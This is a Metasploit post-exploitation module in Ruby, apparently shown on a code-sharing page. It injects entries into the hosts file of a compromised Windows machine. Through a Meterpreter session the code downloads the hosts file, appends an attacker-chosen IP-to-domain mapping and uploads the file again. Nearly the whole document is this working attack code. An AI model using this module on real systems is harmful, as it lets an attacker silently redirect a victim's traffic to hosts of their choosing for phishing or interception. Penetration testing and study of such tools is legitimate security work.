Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'English'
7
class MetasploitModule < Msf::Post
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Manage Hosts File Injection',
14
        'Description' => %q{
15
          This module allows the attacker to insert a new entry into the target
16
          system's hosts file.
17
        },
18
        'License' => BSD_LICENSE,
19
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
20
        'Platform' => [ 'win' ],
21
        'SessionTypes' => [ 'meterpreter' ],
22
        'Compat' => {
23
          'Meterpreter' => {
24
            'Commands' => %w[
25
              core_channel_close
26
              core_channel_eof
27
              core_channel_open
28
              core_channel_read
29
              core_channel_tell
30
              core_channel_write
31
              stdapi_fs_stat
32
            ]
33
          }
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),
41
        OptString.new('IP', [ true, 'IP address to point domain name to.' ])
42
      ]
43
    )
44
  end
45

46
  def run
47
    if datastore['IP'].nil? || datastore['DOMAIN'].nil?
48
      print_error('Please specify both DOMAIN and IP')
49
      return
50
    end
51

52
    ip = datastore['IP']
53
    hostname = datastore['DOMAIN']
54

55
    # Get a temporary file path
56
    meterp_temp = Tempfile.new('meterp')
57
    meterp_temp.binmode
58
    temp_path = meterp_temp.path
59

60
    begin
61
      # Download the remote file to the temporary file
62
      client.fs.file.download_file(temp_path, 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts')
63
    rescue Rex::Post::Meterpreter::RequestError => e
64
      # If the file doesn't exist, then it's okay.  Otherwise, throw the
65
      # error.
66
      if e.result != 2
67
        raise $ERROR_INFO
68
      end
69
    end
70

71
    print_status("Inserting hosts file entry pointing #{hostname} to #{ip}..")
72
    hostsfile = ::File.open(temp_path, 'ab')
73
    hostsfile.write("\r\n#{ip}\t#{hostname}")
74
    hostsfile.close
75

76
    client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', temp_path)
77
    print_good('Done!')
78
  end
79
end
80

81